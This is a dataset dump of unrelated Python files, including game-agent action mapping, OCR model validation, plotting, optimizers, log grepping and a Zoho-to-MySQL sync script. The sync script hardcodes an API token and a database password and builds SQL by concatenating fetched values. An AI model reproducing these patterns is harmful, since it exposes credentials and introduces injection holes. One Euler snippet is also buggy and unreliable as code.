\"\"\"\n if (\n action < 4\n and action < len(battle.available_moves)\n and not battle.force_switch\n ):\n return self.create_order(battle.available_moves[action])\n elif (\n not battle.force_switch\n and battle.can_z_move\n and 0 <= action - 4 < len(battle.active_pokemon.available_z_moves)\n ):\n return self.create_order(\n battle.active_pokemon.available_z_moves[action - 4], z_move=True\n )\n elif (\n battle.can_mega_evolve\n and 0 <= action - 8 < len(battle.available_moves)\n and not battle.force_switch\n ):\n return self.create_order(battle.available_moves[action - 8], mega=True)\n elif 0 <= action - 12 < len(battle.available_switches):\n return self.create_order(battle.available_switches[action - 12])\n else:\n return self.choose_random_move(battle)\n\n @property\n def action_space(self) -> List:\n \"\"\"The action space for gen 7 single battles.\n\n The conversion to moves is done as follows:\n\n 0 <= action < 4:\n The actionth available move in battle.available_moves is executed.\n 4 <= action < 8:\n The action - 4th available move in battle.available_moves is executed,\n with z-move.\n 8 <= action < 12:\n The action - 8th available move in battle.available_moves is executed,\n with mega-evolution.\n 12 <= action < 18\n The action - 12th available switch in battle.available_switches is\n executed.\n \"\"\"\n return self._ACTION_SPACE\n","sub_path":"src/poke_env/player/env_player.py","file_name":"env_player.py","file_ext":"py","file_size_in_byte":15621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"401471416","text":"import requests\npath = \"icons/\"\nfile = open('urls.txt','r')\n#https://vignette.wikia.nocookie.net/leagueoflegends/images/6/61/Guardian%27s_Horn_item.png/revision/latest/scale-to-width-down/40\nfor url in file.readlines():\n imageName = url.split('/')[7].replace('%27',\"'\").replace('%21','!').replace('%28','(').replace('%29',')')\n r = requests.get(url)\n with open(path + imageName + \".webp\", \"wb\") as code:\n code.write(r.content)\nprint('end')\n","sub_path":"etc/downloadImages.py","file_name":"downloadImages.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"570343679","text":"from sklearn.decomposition import PCA\nimport pandas as pd\n\ndef prev_cat_count(df, category_col):\n\n df['count'] = 1\n group = df.groupby(category_col).sum()\n group[category_col] = group.index\n\n return df.join(group, on=category_col, rsuffix='_R')['count_R']\n\ndef pca(df, number, name=None, verbose=0):\n\n mod_pca = PCA(number)\n mod_pca.fit(df)\n\n if verbose==1:\n print('>> Explained Variance <<')\n print(mod_pca.explained_variance_)\n print(mod_pca.explained_variance_ratio_)\n\n tran_pca = mod_pca.transform(df)\n\n if name is None:\n name = 'pca'\n\n headers = []\n for i in range(number):\n headers.append('%s_%i' % (name, i))\n\n return pd.DataFrame(tran_pca, columns=headers, index=df.index)\n","sub_path":"depr/0.2.5/dtools/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"431243289","text":"from pyspark import SparkContext\n\nsc = SparkContext(\"spark://spark-master:7077\", \"PopularItems\")\n\ndata = sc.textFile(\"/tmp/data/inputs/sample.in\", 2) # each worker loads a piece of the data file\n\npairs = data.map(lambda line: line.split(\",\")) # tell each worker to split each line of it's partition\npages = pairs.map(lambda pair: (pair[1], 1)) # re-layout the data to ignore the user id\ncount = pages.reduceByKey(lambda x,y: x+y) # shuffle the data so that each key is only on one worker\n # and then reduce all the values by adding them together\n\noutput = count.collect() # bring the data back to the master node so we can print it out\nfor page_id, count in output:\n print (\"page_id %s count %d\" % (page_id, count))\nprint (\"Popular items done\")\n\nsc.stop()\n","sub_path":"misc/data/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"503000104","text":"limit = 100\n\nresults = 0\ndef step(x, memo={1:1, 89:89}):\n if x == 1:\n return 1\n if x == 89:\n return 89\n else:\n next == sum([int(d)**2 for d in str(x)])\n return step(next)\n\n\nfor i in range(1, limit):\n print (i, step(i))\n\n","sub_path":"Euler_92.py","file_name":"Euler_92.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"445433360","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 26 09:58:32 2018\r\n\r\n@author: SHRUTINA\r\n\"\"\"\r\n\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 17-9-25 下午3:56\r\n# @Author : Luo Yao\r\n# @Site : http://github.com/TJCVRS\r\n# @File : validate_shadownet.py\r\n# @IDE: PyCharm Community Edition\r\n\"\"\"\r\nValidate shadow net script\r\n\"\"\"\r\nimport os.path as ops\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport argparse\r\nimport numpy as np\r\nimport math\r\nimport os\r\n#from local_utils import data_utils\r\n#from crnn_model import crnn_model\r\n#from global_configuration import config\r\nimport sys\r\n#sys.path.append('/data2/hdia_ocr_data/CRNN')\r\nsys.path.append(os.getcwd()+'/model/CRNN/crnn_model')\r\nsys.path.append(os.getcwd()+'/model/CRNN/local_utils')\r\nsys.path.append(os.getcwd()+'/model/CRNN/global_configuration')\r\nimport crnn_model\r\nimport data_utils\r\nimport config\r\n\r\n\r\ndef init_args():\r\n \"\"\"\r\n\r\n :return:\r\n \"\"\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--filename', type=str, help='Validate filename')\r\n parser.add_argument('--weights_path', type=str, help='Where you store the shadow net weights')\r\n parser.add_argument('--is_recursive', type=bool, help='If need to recursively validate the dataset')\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef validation_shadownet(filename, weights_path, is_vis=False, is_recursive=True):\r\n \"\"\"\r\n\r\n :param dataset_dir:\r\n :param weights_path:\r\n :param is_vis:\r\n :param is_recursive:\r\n :return:\r\n \"\"\"\r\n # Initialize the record decoder\r\n decoder = data_utils.TextFeatureIO().reader\r\n images_t, labels_t, imagenames_t = decoder.read_features(\r\n os.getcwd()+\"/model/CRNN/data/tfReal/\"+filename, num_epochs=None)\r\n if not is_recursive:\r\n images_sh, labels_sh, imagenames_sh = tf.train.shuffle_batch(tensors=[images_t, labels_t, imagenames_t],\r\n batch_size=32, capacity=1000+32*2,\r\n min_after_dequeue=2, num_threads=4)\r\n else:\r\n images_sh, labels_sh, imagenames_sh = tf.train.batch(tensors=[images_t, labels_t, imagenames_t],\r\n batch_size=32, capacity=1000 + 32 * 2, num_threads=4)\r\n\r\n images_sh = tf.cast(x=images_sh, dtype=tf.float32)\r\n\r\n # build shadownet\r\n net = crnn_model.ShadowNet(phase='Validate', hidden_nums=256, layers_nums=2, seq_length=200, num_classes=148)\r\n\r\n with tf.variable_scope('shadow'):\r\n net_out = net.build_shadownet(inputdata=images_sh)\r\n\r\n decoded, _ = tf.nn.ctc_beam_search_decoder(net_out, 200 * np.ones(32), merge_repeated=False)\r\n\r\n # config tf session\r\n sess_config = tf.ConfigProto()\r\n sess_config.gpu_options.per_process_gpu_memory_fraction = config.cfg.TRAIN.GPU_MEMORY_FRACTION\r\n sess_config.gpu_options.allow_growth = config.cfg.TRAIN.TF_ALLOW_GROWTH\r\n\r\n # config tf saver\r\n saver = tf.train.Saver()\r\n\r\n sess = tf.Session(config=sess_config)\r\n\r\n validate_sample_count = 0\r\n for record in tf.python_io.tf_record_iterator(os.getcwd()+\"/model/CRNN/data/tfReal/\"+filename):\r\n validate_sample_count += 1\r\n loops_nums = int(math.ceil(validate_sample_count / 32))\r\n # loops_nums = 100\r\n\r\n with sess.as_default():\r\n\r\n # restore the model weights\r\n saver.restore(sess=sess, save_path=weights_path)\r\n\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\r\n\r\n print('Start predicting ......')\r\n if not is_recursive:\r\n predictions, images, labels, imagenames = sess.run([decoded, images_sh, labels_sh, imagenames_sh])\r\n imagenames = np.reshape(imagenames, newshape=imagenames.shape[0])\r\n imagenames = [tmp.decode('utf-8') for tmp in imagenames]\r\n preds_res = decoder.sparse_tensor_to_str(predictions[0])\r\n gt_res = decoder.sparse_tensor_to_str(labels)\r\n\r\n accuracy = []\r\n\r\n for index, gt_label in enumerate(gt_res):\r\n pred = preds_res[index]\r\n totol_count = len(gt_label)\r\n correct_count = 0\r\n try:\r\n for i, tmp in enumerate(gt_label):\r\n if tmp == pred[i]:\r\n correct_count += 1\r\n except IndexError:\r\n continue\r\n finally:\r\n try:\r\n accuracy.append(correct_count / totol_count)\r\n except ZeroDivisionError:\r\n if len(pred) == 0:\r\n accuracy.append(1)\r\n else:\r\n accuracy.append(0)\r\n\r\n accuracy = np.mean(np.array(accuracy).astype(np.float32), axis=0)\r\n print('Mean validate accuracy is {:5f}'.format(accuracy))\r\n\r\n for index, image in enumerate(images):\r\n print('Predict {:s} image with gt label: {:s} **** predict label: {:s}'.format(\r\n imagenames[index], gt_res[index], preds_res[index]))\r\n if is_vis:\r\n plt.imshow(image[:, :, (2, 1, 0)])\r\n plt.show()\r\n else:\r\n accuracy = []\r\n for epoch in range(loops_nums):\r\n predictions, images, labels, imagenames = sess.run([decoded, images_sh, labels_sh, imagenames_sh])\r\n imagenames = np.reshape(imagenames, newshape=imagenames.shape[0])\r\n imagenames = [tmp.decode('utf-8') for tmp in imagenames]\r\n preds_res = decoder.sparse_tensor_to_str(predictions[0])\r\n gt_res = decoder.sparse_tensor_to_str(labels)\r\n\r\n for index, gt_label in enumerate(gt_res):\r\n pred = preds_res[index]\r\n totol_count = len(gt_label)\r\n correct_count = 0\r\n try:\r\n for i, tmp in enumerate(gt_label):\r\n if tmp == pred[i]:\r\n correct_count += 1\r\n except IndexError:\r\n continue\r\n finally:\r\n try:\r\n accuracy.append(correct_count / totol_count)\r\n except ZeroDivisionError:\r\n if len(pred) == 0:\r\n accuracy.append(1)\r\n else:\r\n accuracy.append(0)\r\n\r\n for index, image in enumerate(images):\r\n print('Predict {:s} image with gt label: {:s} **** predict label: {:s}'.format(\r\n imagenames[index], gt_res[index], preds_res[index]))\r\n # if is_vis:\r\n # plt.imshow(image[:, :, (2, 1, 0)])\r\n # plt.show()\r\n\r\n accuracy = np.mean(np.array(accuracy).astype(np.float32), axis=0)\r\n print('Validate accuracy is {:5f}'.format(accuracy))\r\n\r\n coord.request_stop()\r\n coord.join(threads=threads)\r\n\r\n sess.close()\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n # init args\r\n args = init_args()\r\n\r\n # validate shadow net\r\n validation_shadownet(args.filename, args.weights_path, args.is_recursive)\r\n","sub_path":"model/CRNN/tools/validate_shadownet.py","file_name":"validate_shadownet.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"569561282","text":"import tensorflow as tf\n\ndef loss_function(real, pred, loss_object):\n mask = tf.math.logical_not(tf.math.equal(real, 0))\n loss_ = loss_object(real, pred)\n\n mask = tf.cast(mask, dtype=loss_.dtype)\n loss_ *= mask\n\n return tf.reduce_mean(loss_)","sub_path":"experimentation/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"133003916","text":"import pymysql\nimport requests\nimport json\nimport time\nimport calendar\n\nt1 = time.localtime(time.time()-86400)\ndate = ''.join([str(int(t1.tm_mday)), '-', calendar.month_abbr[int(t1.tm_mon)], '-', str(t1.tm_year)])\n\nurl = 'https://creator.zoho.com.cn/api/json/xunlian/view/form_XunLianLiang_Report?authtoken=d51ecfa14f98e8f14c91ac894bf8e7d4&scope=creatorapi&criteria=(Added_Time.After(\"' + date + '\"))'\ndata = requests.get(url).text\ndata = data.replace(' ', '').split('=')[1][:-1]\ndata = json.loads(data)['form_XunLianLiang']\n\nurl1 = 'https://creator.zoho.com.cn/api/json/xunlian/view/form_XunLianLiang_Report?authtoken=d51ecfa14f98e8f14c91ac894bf8e7d4&scope=creatorapi&criteria=(Modified_Time.After(\"' + date + '\"))'\ndata1 = requests.get(url1).text\ndata1 = data1.replace(' ', '').split('=')[1][:-1]\ndata1 = json.loads(data1)['form_XunLianLiang']\n\ndata = data + data1\n# print(len(data))\nfor i in data:\n fie = ['ID', 'form_YunDongYuan', 'Formula_ZuZhiJiaGou', 'Date_field_XunLianRiQi', 'Dropdown_XunLianKeMu', 'Number_XunLianShiChang']\n\n img = ''\n val = [str(i['ID']), str('\"'+str(i['form_YunDongYuan'])+'\"'), str('\"'+str(i['Formula_ZuZhiJiaGou'])+'\"'), str('\"'+str(i['Date_field_XunLianRiQi'])+'\"'),\n str('\"' + str(i['Dropdown_XunLianKeMu']) + '\"'), str('\"'+str(i['Number_XunLianShiChang'])+'\"')]\n\n\n db = pymysql.connect('video.hbang.com.cn', 'video', 'P@ssw0rd235', 'video')\n cursor = db.cursor()\n sql = \"replace into form_XunLianLiang(\" + ','.join(fie) + \") \" + \"values(\" + ','.join(val) + \")\"\n cursor.execute(sql)\n db.commit()\n db.close()\n","sub_path":"XunLianLiang_zoho-mysql.py","file_name":"XunLianLiang_zoho-mysql.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"284373981","text":"\r\n\r\n###########################################\r\n#\r\n# plottester\r\n#\r\n# procedural way to load multiple files\r\n#\r\n###########################################\r\n\r\nimport os\r\nimport pandas as pd\r\n\r\n\r\n\r\n \r\ndef generate_plot(x, y, partner_name):\r\n import matplotlib.pyplot as plt \r\n \r\n \r\n \r\n # plotting the points \r\n plt.plot(x, y, color='green', linestyle='dashed', linewidth = 3, \r\n marker='o', markerfacecolor='blue', markersize=12) \r\n \r\n # setting x and y axis range \r\n plt.ylim(1,20) \r\n plt.xlim(1,20) \r\n \r\n # naming the x axis \r\n plt.xlabel('x - axis') \r\n # naming the y axis \r\n plt.ylabel('y - axis') \r\n \r\n # giving a title to my graph \r\n plt.title(partner_name) \r\n \r\n # function to show the plot \r\n plt.show() \r\n\r\n\r\n\r\n\r\ndef main():\r\n\r\n print(\"Starting plottester routine\")\r\n \r\n # x axis values \r\n x = [1,2,3,4,5,6] \r\n # corresponding y axis values \r\n y = [2,4,1,5,2,6] \r\n \r\n partner_name = 'Infocon'\r\n\r\n generate_plot(x, y, partner_name)\r\n \r\n \r\n # x axis values \r\n x = [12,10,10,14,18,7] \r\n # corresponding y axis values \r\n y = [12,14,11,15,20,16] \r\n \r\n partner_name = 'Indiana'\r\n\r\n generate_plot(x, y, partner_name)\r\n\r\n \r\n \r\n \r\n \r\n\r\n print(\"Complete!\")\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n ","sub_path":"plottester.py","file_name":"plottester.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"293170241","text":"@unittest.skipIf((not TEST_NUMPY), 'Numpy not found')\ndef test_beta_log_prob(self):\n for _ in range(100):\n alpha = np.exp(np.random.normal())\n beta = np.exp(np.random.normal())\n dist = Beta(alpha, beta)\n x = dist.sample()\n actual_log_prob = dist.log_prob(x).sum()\n expected_log_prob = scipy.stats.beta.logpdf(x, alpha, beta)[0]\n self.assertAlmostEqual(actual_log_prob, expected_log_prob, places=3)","sub_path":"Data Set/bug-fixing-5/54e11639f9b8abacd6a67274126cd097bb4af6ca--fix.py","file_name":"54e11639f9b8abacd6a67274126cd097bb4af6ca--fix.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"630732082","text":"import xdrlib\nimport numpy as np\nimport pandas as pd\nimport sensorcloud as sc\nimport logging\n\n\ndef processAPSFile(file):\n logger = logging.getLogger('solaroad.aps')\n\n x = pd.read_csv(file, delimiter=',', skip_blank_lines=True, na_values='-')\n x = x.dropna()\n x = x.drop_duplicates(subset=['Reporting Time'])\n index_time = pd.to_datetime(x['Reporting Time'], format=\"%Y-%m-%d %H:%M:%S\")\n x.index = index_time\n for key in x.keys():\n if 'Unnamed' in key:\n del (x[key])\n\n for inverterId in x['Inverter ID'].unique():\n logger.debug('======================== Now processing %s ========================', inverterId)\n y = x.loc[x['Inverter ID'] == inverterId]\n del (y['Inverter ID'])\n\n y = y.resample('5min').mean().interpolate(method='pad')\n\n server, auth_token = sc.authenticate()\n deviceId = sc.getDeviceId()\n\n ctr = 0\n total_steps = np.round(len(y) / sc.MAX_POINTS) + 1\n while ctr < total_steps:\n sp = ctr * sc.MAX_POINTS\n tmp = y.iloc[sp:sp + sc.MAX_POINTS - 1, :]\n logger.debug('--------------------- RECORD %s/%s ------------------------------', ctr + 1, total_steps)\n\n sc.addSensor(server, auth_token, deviceId, inverterId, inverterId, inverterId, inverterId)\n\n logger.debug('Now uploading %s', inverterId)\n\n for key in tmp.keys():\n packer = xdrlib.Packer()\n packer.pack_int(1) # version 1\n\n packer.pack_enum(sc.SECONDS)\n packer.pack_int(300)\n\n POINTS = len(tmp)\n packer.pack_int(POINTS)\n\n channel = '_'.join(key.replace('(', '').replace(')', '').split(' '))\n sc.addChannel(server, auth_token, deviceId, inverterId, channel, channel, channel)\n\n logger.debug('Now uploading %s', channel)\n\n for item in tmp[key].iteritems():\n val = item[1]\n timestamp = item[0].to_pydatetime().timestamp() * 1000000000\n packer.pack_hyper(int(timestamp))\n packer.pack_float(float(val))\n\n data = packer.get_buffer()\n sc.uploadData(server, auth_token, deviceId, inverterId, channel, data)\n ctr = ctr + 1\n","sub_path":"apsMECFileProcessor.py","file_name":"apsMECFileProcessor.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"552954435","text":"# File: greptest.py\n\nimport os\nimport subprocess\n\nchoice = \"yes\"\nwhile(choice.lower() != \"no\" ): \n fileName = input(\"What is the name of the file? (api,esb,fp,np-server) : \")\n\n fileEnv = input(\"What is the env of the file? (qa1,dev,qaperf2) : \")\n\n fileLoc = input(\"What is the loc of the file? (SAC,am1) : \")\n\n path = \"/Users/rbattula/Documents/apache-access-\" + fileName + \"-\" + fileEnv + \"-\" \"\" + fileLoc\n os.chdir(path)\n\n beginDate = input(\"Enter the start date (yyyy-mm-dd)\")\n\n beginMonth = beginDate[5:7 ]\n\n beginDay = beginDate[8: ]\n\n\n endDate = input(\"Enter the end date (yyyy-mm-dd)\")\n\n endMonth = endDate[5:7 ]\n\n endDay = endDate[8: ]\n\n\n dates = list()\n if(int(beginMonth) == int(endMonth)):\n i = int(beginDay)\n while i<=int(endDay):\n if(i<10):\n dates.append(beginMonth + \"-0\" + str(i))\n else:\n dates.append(beginMonth + \"-\" + str(i))\n i+= 1\n \n if(int(beginMonth) != int(endMonth)):\n i = int(beginDay)\n j=1\n if((int(beginMonth) == 1) | (int(beginMonth) == 3) |(int(beginMonth) == 5) | (int(beginMonth) == 7) | (int(beginMonth) == 8) | (int(beginMonth) == 10) | (int(beginMonth) == 12)):\n while(i<=31):\n if(i<10):\n dates.append(beginMonth + \"-0\" + str(i))\n else:\n dates.append(beginMonth + \"-\" + str(i))\n i+= 1\n while(j<=int(endDay)):\n if(j<10):\n dates.append(endMonth + \"-0\" + str(j))\n else:\n dates.append(endMonth + \"-\" + str(j))\n j+= 1\n elif(int(beginMonth) == 2):\n while(i<=28):\n if(i<10):\n dates.append(beginMonth + \"-0\" + str(i))\n else:\n dates.append(beginMonth + \"-\" + str(i))\n i+= 1\n while(j<=int(endDay)):\n if(j<10):\n dates.append(endMonth + \"-0\" + str(j))\n else:\n dates.append(endMonth + \"-\" + str(j))\n j+= 1\n else:\n while(i<=30):\n if(i<10):\n dates.append(beginMonth + \"-0\" + str(i))\n else:\n dates.append(beginMonth + \"-\" + str(i))\n i+= 1\n while(j<=int(endDay)):\n if(j<10):\n dates.append(endMonth + \"-0\" + str(j))\n else:\n dates.append(endMonth + \"-\" + str(j))\n j+= 1\n \n \n folder = os.listdir(path)\n for fileNames in folder:\n for days in dates:\n if(days in fileNames):\n for line in open(fileNames):\n if ((\"warn\" in line) | (\"WARN\" in line) | (\"err\" in line) | (\"ERR\" in line) | (\"error\" in line) | (\"Error\" in line) | (\"ERROR\" in line) | (\"exception\" in line) | (\"Exception\"in line) | (\"EXCEPTION\" in line)):\n print(line)\n choice = input(\"Would you like to choose another file to search? (yes or no)\")\n if(choice.lower() == \"no\"): \n print(\"Program has now ended.\")\n \n\n\n\n\n\n\n\n\n","sub_path":"LogChecker.py","file_name":"LogChecker.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"583817310","text":"import cv2\nimport numpy as np\nimport os\n\ndef showcam(mirror=False):\n camera = cv2.VideoCapture(0)\n\n if (camera.isOpened() == False):\n print(\"UNABLE TO READ CAMERA\")\n\n frame_width = int(camera.get(3))\n frame_height = int(camera.get(4))\n\n out = cv2.VideoWriter('video.avi', cv2.VideoWriter_fourcc('M','J','P','G'), 10, (frame_width, frame_height))\n \n while True:\n retangleValue, img = camera.read()\n\n if mirror:\n img = cv2.flip(img, 1)\n\n if retangleValue == True:\n out.write(img)\n rgb = cv2.cvtColor(img, cv2.COLOR_BGR2BGRA)\n cv2.imshow('WEBCAME', img)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break #ESC untuk keluar\n else:\n break\n\n camera.release()\n out.release()\n \n cv2.destroyAllWindows()\n\ndef main():\n showcam(mirror=True)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Step-3/recordvideo.py","file_name":"recordvideo.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206110559","text":"import numpy as np\n\n\ndef common_upadate(weight, lr, d_w):\n weight -= lr * d_w\n\n\nclass momentum_update:\n def __init__(self):\n self.v = 0\n self.mu = 0.99\n\n def update(self, x, d_x, lr):\n v = self.mu * self.v - lr * d_x\n x -= v\n\n\nclass nesterov_momentum:\n def __init__(self, v=None, mu=None):\n if v is None:\n self.v = 0\n else:\n self.v = v\n if mu is None:\n self.mu = 0.99\n else:\n self.mu = mu\n\n def update(self, x, d_x, lr):\n v_prev = self.v\n v = self.mu * self.v - lr * d_x\n x += -self.mu * v_prev + (1 + self.mu) * v\n\n\nclass Adagrad:\n def __init__(self, eps=None):\n self.cache = 0\n if eps is None:\n self.eps = 1e-8\n else:\n self.eps = eps\n\n def update(self, x, lr, d_x):\n self.cache += -d_x ** 2\n x += -lr * d_x / (np.sqrt(self.cache) + self.eps)\n\n\nclass RMSprop:\n def __init__(self, eps=None, decay_rate=None):\n self.cache = 0\n if eps is None:\n self.eps = 1e-8\n else:\n self.eps = eps\n if decay_rate is None:\n self.decay_rate = 0.99\n else:\n self.decay_rate = decay_rate\n\n def update(self, x, d_x, lr):\n self.cache = self.decay_rate * self.cache + (1 - self.decay_rate) * d_x ** 2\n x += -lr * d_x / (np.sqrt(self.cache) + self.eps)\n\n\nclass Adam:\n def __init__(self, eps=None, beta1=None, beta2=None):\n if eps is None:\n self.eps = 1e-8\n else:\n self.eps = eps\n if beta1 is None:\n self.beta1 = 0.9\n else:\n self.beta1 = beta1\n if beta2 is None:\n self.beta2 = 0.999\n else:\n self.beta2 = beta2\n self.m = 0\n self.v = 0\n\n def update(self, x, d_x, lr):\n self.m = self.beta1 * self.m + (1 - self.beta1) * d_x\n self.v = self.beta2 * self.v + (1 - self.beta2) * (d_x ** 2)\n x += -lr * self.m / (np.sqrt(self.v) + self.eps)\n","sub_path":"framework/weights_update.py","file_name":"weights_update.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"605036278","text":"import os\nimport sys\nimport re\nimport argparse\nimport json\nimport tensorflow as tf\nimport numpy as np\nimport csv\n\nimport torch\n\nimport logging\n\nfrom mlcore.callback import Callback\n\n\nclass FilterSELFManager(Callback):\n def __init__(\n self,\n path,\n cache_reader,\n cache_writer,\n filter_dataloader,\n alpha=0.5,\n patience=10,\n device=\"cpu\",\n metric=\"loss\",\n target=\"minimizing\",\n index=\"id\",\n ):\n\n self._alpha_filter = alpha\n self._iter = 0\n\n self.path = path\n self.cache_reader = cache_reader\n self.cache_writer = cache_writer\n self.filter_dataloader = filter_dataloader\n self.device = device\n self.index = index\n self.patience = patience\n self._patience_step = 0\n\n self._metric = metric\n self._target = target\n self._best_target = np.finfo(np.float32).max if target == \"minimizing\" else np.finfo(np.float32).min\n\n def on_test_end(self, **kwargs):\n if self._metric not in kwargs:\n print(kwargs)\n raise ValueError()\n\n alpha = min(1 - 1 / (self._iter + 1), self._alpha_filter)\n\n self._patience_step -= 1\n\n target = kwargs[self._metric]\n if self._target == \"minimizing\":\n if target < self._best_target:\n logging.info(\n f\"FilterSELFManager: skip filtering target:{target} < self._best_target:{self._best_target}\"\n )\n self._best_target = target\n return {\n \"filter/iter\": self._iter,\n \"filter/alpha\": alpha,\n \"filter/best_target\": self._best_target,\n \"filter/patience\": self._patience_step,\n }\n else:\n if target > self._best_target:\n logging.info(\n f\"FilterSELFManager: skip filtering target:{target} > self._best_target:{self._best_target}\"\n )\n self._best_target = target\n return {\n \"filter/iter\": self._iter,\n \"filter/alpha\": alpha,\n \"filter/best_target\": self._best_target,\n \"filter/patience\": self._patience_step,\n }\n\n if self._patience_step > 0:\n logging.info(f\"FilterSELFManager: skip filtering patience:{self._patience_step}\")\n return {\n \"filter/iter\": self._iter,\n \"filter/alpha\": alpha,\n \"filter/best_target\": self._best_target,\n \"filter/patience\": self._patience_step,\n }\n\n # reset alpha for mean trainer\n if hasattr(self.trainer, \"_mean_teacher_step\"):\n self.trainer._mean_teacher_step = 0\n\n logging.info(f\"FilterSELFManager: start filtering with alpha:{alpha} for iter:{self._iter}\")\n with self.cache_reader() as reader:\n with self.cache_writer() as writer:\n for batch_id, sample in enumerate(self.filter_dataloader):\n result = self.trainer.val_step(sample, device=self.device)\n prediction = result[\"model_output\"][\"prediction\"].cpu().numpy()\n for batch_element in range(prediction.shape[0]):\n cache_id = sample[self.index][batch_element]\n # Compute moving average of all predictions\n old_prediction = reader.read(cache_id)\n\n if old_prediction is None:\n old_prediction = np.zeros_like(prediction[batch_element])\n else:\n old_prediction = old_prediction[\"prediction\"]\n\n average_prediction = old_prediction * alpha + (1 - alpha) * prediction[batch_element]\n\n # print(average_prediction)\n writer.write(cache_id, [\"prediction\"], [average_prediction])\n\n self._patience_step = self.patience\n self._iter += 1\n return {\n \"filter/iter\": self._iter,\n \"filter/alpha\": alpha,\n \"filter/best_target\": self._best_target,\n \"filter/patience\": self._patience_step,\n }\n\n def state_dict(self, **kwargs):\n return {\n \"alpha_filter\": self._alpha_filter,\n \"iter\": self._iter,\n \"lowest_loss\": self._best_target,\n \"patience_step\": self._patience_step,\n }\n\n def load_state_dict(self, data: dict):\n self._alpha_filter = data[\"alpha_filter\"]\n self._iter = data[\"iter\"]\n self._best_target = data[\"lowest_loss\"]\n self._patience_step = data[\"patience_step\"]\n\n\nclass FilterSELFIterableDataset(torch.utils.data.IterableDataset):\n def __init__(\n self,\n dataset,\n cache_reader,\n filter_method,\n filtered_delete=False,\n random_deletion=None,\n random_deletion_start=False,\n index=\"id\",\n ):\n self.dataset = dataset\n self.cache_reader = cache_reader\n self.filter_method = filter_method\n self.filtered_delete = filtered_delete\n self.random_deletion = random_deletion\n self.random_deletion_start = random_deletion_start\n self.index = index\n\n def handle_sample(self, reader, sample):\n if \"loss_weight\" in sample:\n loss_weight = sample[\"loss_weight\"]\n else:\n loss_weight = torch.tensor(1, dtype=torch.float32)\n\n if self.random_deletion is not None:\n loss_weight = (torch.rand(size=[]) > self.random_deletion).float()\n\n if sample[self.index] not in reader:\n if self.random_deletion_start:\n loss_weight = (torch.rand(size=[]) > self.random_deletion_start).float()\n return {**sample, \"loss_weight\": loss_weight}\n entry = reader.read(sample[self.index])\n if entry is None:\n return {**sample, \"loss_weight\": loss_weight}\n\n prediction = entry[\"prediction\"]\n # TODO top_k or equal argmax\n # if prediction not in x['concept_ids'].tolist():\n # continue\n decision = self.filter_method(sample, prediction)\n if decision:\n # print(f\"{decision} {sample['id']} {sample['label']} {sample['concept_ids']} {prediction}\")\n if self.filtered_delete:\n return None\n else:\n return {**sample, \"loss_weight\": torch.tensor(0, dtype=torch.float32)}\n\n return {**sample, \"loss_weight\": loss_weight}\n\n def __iter__(self):\n with self.cache_reader() as reader:\n for x in self.dataset:\n result = self.handle_sample(reader, x)\n if result is None:\n continue\n yield result\n\n def __len__(self):\n return len(self.dataset)\n\n\nclass SplitIterableDataset(torch.utils.data.IterableDataset):\n def __init__(self, dataset, return_unlabeled=False):\n self.dataset = dataset\n self.return_unlabeled = return_unlabeled\n\n def __iter__(self):\n for x in self.dataset:\n\n if self.return_unlabeled:\n if x[\"loss_weight\"] == 0:\n yield x\n else:\n continue\n else:\n if x[\"loss_weight\"] == 1:\n yield x\n else:\n continue\n\n def __len__(self):\n return len(self.dataset)\n","sub_path":"gan/mlcore/filter/filter_self.py","file_name":"filter_self.py","file_ext":"py","file_size_in_byte":7530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"37041783","text":"# Import required libraries\nimport ply.lex as lex\nimport sys\n\n# Create a list of reserved words.\nreserved = {\n 'if' : 'IF',\n 'cond' : 'COND',\n 'else' : 'ELSE',\n 'case' : 'CASE',\n 'lambda' : 'LAMBDA',\n 'define' : 'DEFINE',\n 'and' : 'AND',\n 'or' : 